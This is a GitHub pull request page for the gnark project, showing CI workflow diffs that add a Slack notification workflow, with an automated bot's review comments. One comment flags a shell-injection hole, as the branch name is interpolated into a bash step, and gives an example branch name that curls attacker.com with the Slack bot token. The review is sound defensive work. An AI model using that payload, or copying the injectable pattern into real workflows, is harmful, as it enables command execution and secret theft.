Skip to content

docs: update README.md #1712

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
gbotrel merged 6 commits into from
Feb 11, 2026
Merged

docs: update README.md #1712

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
6 commits
Select commit Hold shift + click to select a range
9b4d00a
docs: update README.md
gbotrel Feb 10, 2026
77ad9a3
reintroduce slack notif
gbotrel Feb 10, 2026
7141fbb
reintroduce slack notif and use go tools
gbotrel Feb 10, 2026
bdf0312
build: update to latest gnark crypto
gbotrel Feb 10, 2026
44a69e4
test: shorten pr workflow tests
gbotrel Feb 11, 2026
b450755
Merge remote-tracking branch 'origin/master' into docs/chore
gbotrel Feb 11, 2026
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
31 changes: 19 additions & 12 deletions .github/workflows/pr.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -27,14 +27,10 @@ jobs:
go-version: ${{ env.GO_VERSION }}
cache: true

- name: install deps
Comment thread
cursor[bot] marked this conversation as resolved.
run: |
go install golang.org/x/tools/cmd/goimports@${{ env.GOIMPORTS_VERSION }}
go install github.com/klauspost/asmfmt/cmd/asmfmt@${{ env.ASMFMT_VERSION }}
- name: gofmt
run: if [[ -n $(gofmt -l .) ]]; then echo "please run gofmt"; exit 1; fi
- name: goimports
run: if [[ -n $(goimports -l .) ]]; then echo "please run goimports"; exit 1; fi
run: if [[ -n $(go tool goimports -l .) ]]; then echo "please run goimports"; exit 1; fi
- name: generated files should not be modified
run: |
go generate ./...
Expand Down Expand Up @@ -67,8 +63,6 @@ jobs:

- name: install deps
run: |
go install golang.org/x/tools/cmd/goimports@${{ env.GOIMPORTS_VERSION }}
go install github.com/klauspost/asmfmt/cmd/asmfmt@${{ env.ASMFMT_VERSION }}
go install github.com/consensys/[email protected]
go install github.com/ethereum/go-ethereum/cmd/[email protected]
sudo add-apt-repository ppa:ethereum/ethereum
Expand All @@ -86,8 +80,21 @@ jobs:
- name: Run tests
run: |
set -euo pipefail
go test -json -v -p 4 -short -timeout=30m ./... 2>&1 | gotestfmt -hide=all | tee /tmp/gotest.log
go test -json -v -p 4 -timeout=30m -tags=release_checks,solccheck . 2>&1 | gotestfmt -hide=all | tee -a /tmp/gotest.log
go test -json -v -p 4 -timeout=30m -tags=prover_checks ./test/... 2>&1 | gotestfmt -hide=all | tee -a /tmp/gotest.log
go test -json -v -p 4 -timeout=30m -tags=prover_checks ./examples/... 2>&1 | gotestfmt -hide=all | tee -a /tmp/gotest.log
go test -json -v -run=NONE -fuzz=FuzzIntcomp -fuzztime=30s ./internal/backend/ioutils 2>&1 | gotestfmt -hide=all | tee -a /tmp/gotest.log
go test -short -json -v -p 4 -short -timeout=30m ./... 2>&1 | gotestfmt -hide=all | tee /tmp/gotest.log
Copy link
Copy Markdown

@cursor cursor bot Feb 11, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Duplicate -short flag in test command

Low Severity

The go test command on this line passes -short twice: once at the beginning and once after -p 4. The original command already had -short before -timeout=30m, and the bulk addition of -short to the start of each test line created this duplication. While Go silently accepts duplicate flags, this is clearly unintentional and suggests a missed cleanup.

Fix in Cursor Fix in Web

go test -short -json -v -p 4 -timeout=30m -tags=release_checks,solccheck . 2>&1 | gotestfmt -hide=all | tee -a /tmp/gotest.log
go test -short -json -v -p 4 -timeout=30m -tags=prover_checks ./test/... 2>&1 | gotestfmt -hide=all | tee -a /tmp/gotest.log
go test -short -json -v -p 4 -timeout=30m -tags=prover_checks ./examples/... 2>&1 | gotestfmt -hide=all | tee -a /tmp/gotest.log
go test -short -json -v -run=NONE -fuzz=FuzzIntcomp -fuzztime=10s ./internal/backend/ioutils 2>&1 | gotestfmt -hide=all | tee -a /tmp/gotest.log

notify:
needs: test
if: always()
uses: ./.github/workflows/slack-notifications.yml
with:
status: ${{ needs.test.result == 'success' && 'success' || 'failure' }}
actor: ${{ github.actor }}
repository: ${{ github.repository }}
branch: ${{ github.head_ref }}
run_id: ${{ github.run_id }}
secrets:
SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }}
23 changes: 14 additions & 9 deletions .github/workflows/push.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -13,8 +13,6 @@ permissions:

env:
GO_VERSION: 1.25.x
GOIMPORTS_VERSION: v0.42.0
ASMFMT_VERSION: v1.3.2

jobs:
staticcheck:
Expand All @@ -30,14 +28,10 @@ jobs:
go-version: ${{ env.GO_VERSION }}
cache: true

- name: install deps
run: |
go install golang.org/x/tools/cmd/goimports@${{ env.GOIMPORTS_VERSION }}
go install github.com/klauspost/asmfmt/cmd/asmfmt@${{ env.ASMFMT_VERSION }}
- name: gofmt
run: if [[ -n $(gofmt -l .) ]]; then echo "please run gofmt"; exit 1; fi
- name: goimports
run: if [[ -n $(goimports -l .) ]]; then echo "please run goimports"; exit 1; fi
run: if [[ -n $(go tool goimports -l .) ]]; then echo "please run goimports"; exit 1; fi
- name: generated files should not be modified
run: |
go generate ./...
Expand Down Expand Up @@ -80,8 +74,6 @@ jobs:
cache: true
- name: install deps
run: |
go install golang.org/x/tools/cmd/goimports@${{ env.GOIMPORTS_VERSION }}
go install github.com/klauspost/asmfmt/cmd/asmfmt@${{ env.ASMFMT_VERSION }}
go install github.com/ethereum/go-ethereum/cmd/[email protected]
- name: install solc deps
if: startsWith(matrix.os, 'gha-runner-scale-set-ubuntu') == true
Expand All @@ -106,3 +98,16 @@ jobs:
go test -v -p 4 -timeout=50m -tags=release_checks -race ./examples/cubic/...
go test -v -p 4 -timeout=50m -tags=release_checks -short -race ./test/...
go test -v -run=NONE -fuzz=FuzzIntcomp -fuzztime=30s ./internal/backend/ioutils

notify:
needs: test
if: always()
uses: ./.github/workflows/slack-notifications.yml
with:
status: ${{ needs.test.result == 'success' && 'success' || 'failure' }}
actor: ${{ github.actor }}
repository: ${{ github.repository }}
branch: ${{ github.ref_name }}
run_id: ${{ github.run_id }}
secrets:
SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }}
84 changes: 84 additions & 0 deletions .github/workflows/slack-notifications.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,84 @@
name: Slack Notifications

on:
workflow_call:
secrets:
SLACK_BOT_TOKEN:
required: true
inputs:
status:
description: 'The status of the workflow (success or failure)'
required: true
type: string
actor:
description: 'The GitHub actor'
required: true
type: string
repository:
description: 'The GitHub repository'
required: true
type: string
branch:
description: 'The branch name'
required: true
type: string
run_id:
description: 'The workflow run ID'
required: true
type: string

jobs:
notify_slack:
runs-on: ubuntu-latest
steps:
- name: Post to Slack
run: |
if [ "${{ inputs.status }}" == "success" ]; then
payload=$(jq -n --arg repository "${{ inputs.repository }}" --arg branch "${{ inputs.branch }}" --arg actor "${{ inputs.actor }}" --arg run_id "${{ inputs.run_id }}" '{
Copy link
Copy Markdown

@cursor cursor bot Feb 11, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Script injection via branch name in Slack workflow

Medium Severity

${{ inputs.branch }} is directly interpolated into a shell run: block. In the PR workflow, this value comes from ${{ github.head_ref }}, which is a user-controlled branch name. An attacker can craft a branch name containing shell metacharacters (e.g., "; curl attacker.com?t=$SLACK_BOT_TOKEN; #) to achieve arbitrary command execution and potentially exfiltrate SLACK_BOT_TOKEN. The safe pattern is to assign untrusted inputs to environment variables first, then reference them as "$BRANCH" in the script.

Additional Locations (1)

Fix in Cursor Fix in Web

"channel": "team-gnark-build",
"text": "GitHub Action build result: success",
"blocks": [
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": ":large_green_circle: *All checks have passed:* *\($branch)* :white_check_mark:"
},
},
Comment thread
cursor[bot] marked this conversation as resolved.
{
"type": "context",
"elements": [
{
"type": "mrkdwn",
"text": "\($repository) -- \($actor) -- <https://github.com/\($repository)/actions/runs/\($run_id)|View details>"
}
]
}
]
}')
else
payload=$(jq -n --arg repository "${{ inputs.repository }}" --arg branch "${{ inputs.branch }}" --arg actor "${{ inputs.actor }}" --arg run_id "${{ inputs.run_id }}" '{
"channel": "team-gnark-build",
"text": "GitHub Action build result: failure",
"blocks": [
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": ":red_circle: *Failed run:* *\($branch)*"
},
},
{
"type": "context",
"elements": [
{
"type": "mrkdwn",
"text": "\($repository) -- \($actor) -- <https://github.com/\($repository)/actions/runs/\($run_id)|View details>"
}
]
}
]
}')
fi
response=$(curl -s -X POST -H 'Content-type: application/json; charset=utf-8' --data "$payload" https://slack.com/api/chat.postMessage -H "Authorization: Bearer ${{ secrets.SLACK_BOT_TOKEN }}" )
Comment thread
cursor[bot] marked this conversation as resolved.
shell: bash
Loading